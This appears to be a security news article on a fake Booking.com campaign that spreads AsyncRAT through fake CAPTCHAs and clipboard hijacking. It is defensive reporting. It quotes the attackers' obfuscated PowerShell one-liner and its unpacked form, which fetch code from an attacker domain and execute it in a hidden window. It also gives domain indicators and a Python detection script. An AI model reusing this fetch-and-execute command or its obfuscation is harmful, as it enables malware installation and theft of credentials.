Tuesday, March 17, 2026

Fake Booking.com Sites Spread AsyncRAT Malware in Holiday-Themed Scam

With the summer travel season in full swing, cybercriminals have launched a sophisticated campaign targeting travelers through fake Booking.com websites, redirect links, and fraudulent sponsored ads.

According to recent research by Malwarebytes, this campaign leverages evolving domains, fake CAPTCHAs, and dangerous clipboard hijacking techniques to deliver AsyncRAT malware—a Remote Access Trojan that poses severe risks to users’ data and privacy.

Evolving Attack Tactics: From Sponsored Ads to Fake CAPTCHAs

The scam first appeared in mid-May and continues to evolve, with threat actors rotating malicious domains every two to three days to evade detection and blacklists.

The attack vector typically begins when users, searching for travel deals, land on a malicious link disguised as a legitimate Booking.com page—often through gaming sites, social platforms, or sponsored advertisements.

Upon arrival, visitors are greeted by a fake CAPTCHA form, a technique increasingly popular among fraudsters.

Unlike legitimate CAPTCHAs, this prompt is designed to grant the site permission to access the user’s clipboard. When unsuspecting users tick the box, a script quietly injects malicious content into their clipboard.

Figure: fake CAPTCHA prompt

Technical Breakdown: Clipboard Hijacking and PowerShell Payloads

The clipboard injection, executed via JavaScript’s document.execCommand('copy'), plants an obfuscated PowerShell command. The attackers employ deliberate casing, variable name fragments, and quote interruptions to obfuscate their real intentions:

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

Unpacked, it becomes:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

If a user follows the on-screen instructions—typically prompting them to paste and execute this command in the Windows Run dialog—a PowerShell window opens invisibly, fetching and running two executables (ckjg.exe and Stub.exe) from the attacker’s server.

The payload, detected as Backdoor.AsyncRAT, gives full remote control of the victim’s machine to attackers, enabling theft of credentials, financial data, and potentially far-reaching identity fraud.
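
For defenders, the unpacking shown above can be automated and applied to process command lines. The following Python sketch is an added example, not code from Malwarebytes or from this article's source: it normalizes the quote-split, mixed-case command and flags the hidden-window and fetch-then-execute pattern. The function names, finding labels, the threshold of three quotes, and the extra aliases (irm, iwr, iex, Invoke-WebRequest) are assumptions that go slightly beyond the single command quoted here.

```python
import re

# Constructed sample input: the obfuscated command quoted in this article, plus
# one benign administrative command written for this example.
SAMPLES = [
    'pOwERsheLl \u2013N"O"p"rO" /w h -C"Om"ManD "$b"a"np = \'b"kn"g"n"et.com\';'
    '$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"',
    'powershell -NoProfile -Command "Get-ChildItem \'C:\\Users\'"',
]

DASHES = {ord(c): "-" for c in "\u2013\u2014\u2015"}  # PowerShell also accepts these as "-"
FETCH = r"\b(invoke-restmethod|irm|invoke-webrequest|iwr)\b"
EXEC = r"\b(invoke-expression|iex)\b"

def normalize(cmdline: str) -> str:
    """Undo quote interruptions, odd dashes and mixed casing."""
    s = cmdline.translate(DASHES)
    s = re.sub(r"[\"'`]", "", s)
    return re.sub(r"\s+", " ", s).strip().lower()

def has_hidden_window(norm: str) -> bool:
    """True for -WindowStyle Hidden in any abbreviated form, e.g. '/w h'."""
    tokens = norm.split()
    for name, value in zip(tokens, tokens[1:]):
        if (len(name) > 1 and name[0] in "-/"
                and "windowstyle".startswith(name[1:])
                and "hidden".startswith(value)):
            return True
    return False

def analyze(cmdline: str) -> set:
    """Return the set of finding labels (assumed names) for one command line."""
    findings = set()
    norm = normalize(cmdline)
    if not re.search(r"\b(powershell|pwsh)(\.exe)?\b", norm):
        return findings
    # Quotes wedged between letters only make sense as obfuscation.
    if len(re.findall(r'(?<=[A-Za-z])"(?=[A-Za-z])', cmdline)) >= 3:
        findings.add("quote_splitting")
    if has_hidden_window(norm):
        findings.add("hidden_window")
    if re.search(FETCH, norm) and re.search(EXEC, norm):
        findings.add("remote_fetch_then_exec")
    return findings

if __name__ == "__main__":
    for line in SAMPLES:
        print(sorted(analyze(line)), "<-", normalize(line)[:60])
```

Run it over command lines taken from process-creation logs; a line that carries both hidden_window and remote_fetch_then_exec matches the behaviour described in this section.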

Detection, Prevention, and Indicators of Compromise

Users of security tools such as Malwarebytes Browser Guard are alerted when their clipboard is accessed, often with explicit warnings about suspicious content.

Chrome may also display generic warnings about unsafe sites, though these can be vague and easily ignored without awareness of the underlying risk.

Malwarebytes researchers have tracked several domains associated with this campaign, with the URLs changing every few days. Recent examples include:

  • booking.chargedguestescenter[.]com
  • booking.badgustrewivers[.]com
  • booking.property-paids[.]com
  • booking.guestsalerts[.]com
  • bkngnet[.]com

Anyone booking travel online, especially via search engines, should exercise extreme caution and verify URLs carefully.

Staying Safe: Best Practices for Travelers

  • Think before you click: Never follow instructions to copy-paste or execute unfamiliar commands, especially prompted by a CAPTCHA form or pop-up.
  • Use security software: Install reputable anti-malware solutions and enable browser extensions that block malicious domains and clipboard access.
  • Limit JavaScript: Disabling JavaScript can prevent clipboard exploits like this, but be aware it may disrupt browsing on legitimate sites—consider using different browsers for high-risk activities.
  • Check warnings: Don’t ignore browser and security tool alerts; investigate any unusual or unexpected prompts, especially when dealing with travel bookings online.

Figure: Malwarebytes blocks the download from bkngnet[.]com

As holiday scams grow more sophisticated, vigilance and technical awareness are key to safe and stress-free travel planning. Always book through trusted sources and watch for red flags—your vacation plans, and your personal data, depend on it.
